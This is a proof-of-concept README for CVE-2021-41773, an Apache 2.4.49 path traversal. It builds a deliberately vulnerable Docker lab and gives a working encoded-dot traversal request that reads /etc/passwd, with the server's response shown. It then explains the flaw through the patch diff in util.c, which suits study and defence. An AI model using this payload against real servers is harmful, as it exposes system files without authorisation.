来源

关联漏洞

介绍

# CVE-2021-41773
CVE-2021-41773 POC with Docker

### Configuration
To customize the `httpd.conf` file, change line `251` in the `<Directory />` section from `Require all denied` to `Require all granted`.
```
<Directory />
    AllowOverride none
    Require all granted
</Directory>
```

### Create a Dockerfile in your project

```
FROM httpd:2.4.49
COPY ./httpd.conf /usr/local/apache2/conf/httpd.conf
```

Then, run the commands to build and run the Docker image:

```
$ docker build -t apache-pt .
$ docker run -dit --name apache-pt-app -p 81:80 apache-pt
```

### Exploit
Send the following request using BurpSuite Repeater.

```
GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
Host: localhost:81
User-Agent: Mozilla
Connection: close


```

Response:

```
HTTP/1.1 200 OK
Date: Wed, 06 Oct 2021 02:32:09 GMT
Server: Apache/2.4.49 (Unix)
Last-Modified: Mon, 27 Sep 2021 00:00:00 GMT
ETag: "39e-5cceec7356000"
Accept-Ranges: bytes
Content-Length: 926
Connection: close

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

```

### Patch revision
The source code for Apache 2.4.49 (vulnerable) and Apache 2.4.50 (patched) can be downloaded respectively from: 

* https://dlcdn.apache.org//httpd/httpd-2.4.49.tar.gz
* https://dlcdn.apache.org//httpd/httpd-2.4.50.tar.gz

```
$ wget https://dlcdn.apache.org//httpd/httpd-2.4.49.tar.gz
$ wget https://dlcdn.apache.org//httpd/httpd-2.4.50.tar.gz
```

The vulnerability is found in the `/server/util.c` file at line `571` where validation is applied for payloads of type `/xx/../` but not for `/xx/.%2e/`.

The difference between the vulnerable code and the patched code can be obtained with the command diff.
```
$ diff httpd-2.4.49/server/util.c httpd-2.4.50/server/util.c
505c505,506
<     apr_size_t l = 1, w = 1;
---
>     apr_size_t l = 1, w = 1, n;
>     int decode_unreserved = (flags & AP_NORMALIZE_DECODE_UNRESERVED) != 0;
532c533
<         if ((flags & AP_NORMALIZE_DECODE_UNRESERVED)
---
>         if (decode_unreserved
570,571c571,581
<                 /* Remove /xx/../ segments */
<                 if (path[l + 1] == '.' && IS_SLASH_OR_NUL(path[l + 2])) {
---
>                 /* Remove /xx/../ segments (or /xx/.%2e/ when
>                  * AP_NORMALIZE_DECODE_UNRESERVED is set since we
>                  * decoded only the first dot above).
>                  */
>                 n = l + 1;
>                 if ((path[n] == '.' || (decode_unreserved
>                                         && path[n] == '%'
>                                         && path[++n] == '2'
>                                         && (path[++n] == 'e'
>                                             || path[n] == 'E')))
>                         && IS_SLASH_OR_NUL(path[n + 1])) {
588c598
<                     l += 2;
---
>                     l = n + 1;
```

文件快照

 [4.0K]  /data/pocs/6aa873226027530d6a743b87f825e340dbbae99a
├── [  71]  Dockerfile
├── [ 20K]  httpd.conf
└── [3.6K]  README.md

0 directories, 3 files

备注